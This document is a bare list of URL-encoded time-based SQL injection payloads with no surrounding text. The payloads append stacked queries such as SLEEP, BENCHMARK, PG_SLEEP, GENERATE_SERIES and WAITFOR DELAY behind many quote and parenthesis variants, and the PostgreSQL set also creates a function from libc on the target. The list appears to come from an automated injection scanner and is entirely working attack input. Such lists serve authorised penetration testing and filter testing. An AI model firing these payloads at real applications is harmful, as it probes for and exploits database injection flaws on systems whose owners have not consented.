1%29%3B%20SELECT%20SLEEP%285%29--%20 1%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%3B%20SELECT%20SLEEP%285%29--%20 1%29%20WHERE%206529%3D6529%3B%20SELECT%20SLEEP%285%29--%20 1%20WHERE%202943%3D2943%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%3B%20SELECT%20SLEEP%285%29--%20 1%22%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%27%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%22%3B%20SELECT%20SLEEP%285%29--%20 1%25%27%29%3B%20SELECT%20SLEEP%285%29--%20 1%25%27%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%25%27%29%29%29%3B%20SELECT%20SLEEP%285%29--%20 1%25%27%3B%20SELECT%20SLEEP%285%29--%20 1%00%27%29%3B%20SELECT%20SLEEP%285%29--%20 1%00%27%3B%20SELECT%20SLEEP%285%29--%20 1%27%29%20WHERE%202055%3D2055%3B%20SELECT%20SLEEP%285%29--%20 1%22%29%20WHERE%204166%3D4166%3B%20SELECT%20SLEEP%285%29--%20 1%27%20WHERE%204458%3D4458%3B%20SELECT%20SLEEP%285%29--%20 1%22%20WHERE%202367%3D2367%3B%20SELECT%20SLEEP%285%29--%20 1%27%7C%7C%28SELECT%20%27fdpA%27%20FROM%20DUAL%20WHERE%208616%3D8616%3B%20SELECT%20SLEEP%285%29--%20 1%27%7C%7C%28SELECT%20%27ebWS%27%20WHERE%203316%3D3316%3B%20SELECT%20SLEEP%285%29--%20 1%27%2B%28SELECT%20yZTH%20WHERE%203510%3D3510%3B%20SELECT%20SLEEP%285%29--%20 1%27%2B%28SELECT%20%27TRvX%27%20WHERE%208663%3D8663%3B%20SELECT%20SLEEP%285%29--%20 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29--%20 1%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%29%20WHERE%207817%3D7817%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%20WHERE%207226%3D7226%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%25%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%25%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%25%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%25%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%00%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%00%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%29%20WHERE%208486%3D8486%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%29%20WHERE%204300%3D4300%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%20WHERE%205228%3D5228%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%22%20WHERE%209975%3D9975%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%7C%7C%28SELECT%20%27VHaz%27%20FROM%20DUAL%20WHERE%209664%3D9664%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%7C%7C%28SELECT%20%27PnyG%27%20WHERE%204546%3D4546%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%2B%28SELECT%20bQzF%20WHERE%204374%3D4374%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%2B%28SELECT%20%27urlq%27%20WHERE%205404%3D5404%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x426a4d52%29%29--%20 1%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%3B%20SELECT%20PG_SLEEP%285%29-- 1%29%20WHERE%206116%3D6116%3B%20SELECT%20PG_SLEEP%285%29-- 1%20WHERE%201074%3D1074%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%3B%20SELECT%20PG_SLEEP%285%29-- 1%25%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%25%27%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%25%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%25%27%3B%20SELECT%20PG_SLEEP%285%29-- 1%00%27%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%00%27%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%29%20WHERE%205410%3D5410%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%29%20WHERE%201104%3D1104%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%20WHERE%208714%3D8714%3B%20SELECT%20PG_SLEEP%285%29-- 1%22%20WHERE%205050%3D5050%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%7C%7C%28SELECT%20%27qyDP%27%20FROM%20DUAL%20WHERE%201235%3D1235%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%7C%7C%28SELECT%20%27HQUp%27%20WHERE%203016%3D3016%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%2B%28SELECT%20nKoU%20WHERE%205178%3D5178%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%2B%28SELECT%20%27HbfH%27%20WHERE%201047%3D1047%3B%20SELECT%20PG_SLEEP%285%29-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%29%20WHERE%208941%3D8941%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%20WHERE%203423%3D3423%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%29%20WHERE%206950%3D6950%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%29%20WHERE%201054%3D1054%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%20WHERE%203390%3D3390%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%22%20WHERE%205238%3D5238%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%7C%7C%28SELECT%20%27VAXn%27%20FROM%20DUAL%20WHERE%202623%3D2623%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%7C%7C%28SELECT%20%27NDwt%27%20WHERE%205225%3D5225%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%2B%28SELECT%20cFcq%20WHERE%202763%3D2763%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%2B%28SELECT%20%27uhuK%27%20WHERE%205791%3D5791%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29-- 1%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%29%20WHERE%205612%3D5612%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%20WHERE%205067%3D5067%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%25%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%25%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%25%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%25%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%00%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%00%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%29%20WHERE%205962%3D5962%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%29%20WHERE%207958%3D7958%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%20WHERE%202697%3D2697%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%22%20WHERE%209232%3D9232%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%7C%7C%28SELECT%20%27bLKg%27%20FROM%20DUAL%20WHERE%207276%3D7276%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%7C%7C%28SELECT%20%27jmNu%27%20WHERE%202245%3D2245%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%2B%28SELECT%20EoIF%20WHERE%209449%3D9449%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%2B%28SELECT%20%27oefP%27%20WHERE%207987%3D7987%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%20WHERE%207738%3D7738%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%20WHERE%209139%3D9139%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%00%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%00%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WHERE%204225%3D4225%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%20WHERE%202032%3D2032%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WHERE%204796%3D4796%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WHERE%201269%3D1269%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%7C%7C%28SELECT%20%27Znbk%27%20FROM%20DUAL%20WHERE%202665%3D2665%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%7C%7C%28SELECT%20%27Zovf%27%20WHERE%202059%3D2059%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%2B%28SELECT%20NmWR%20WHERE%202690%3D2690%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 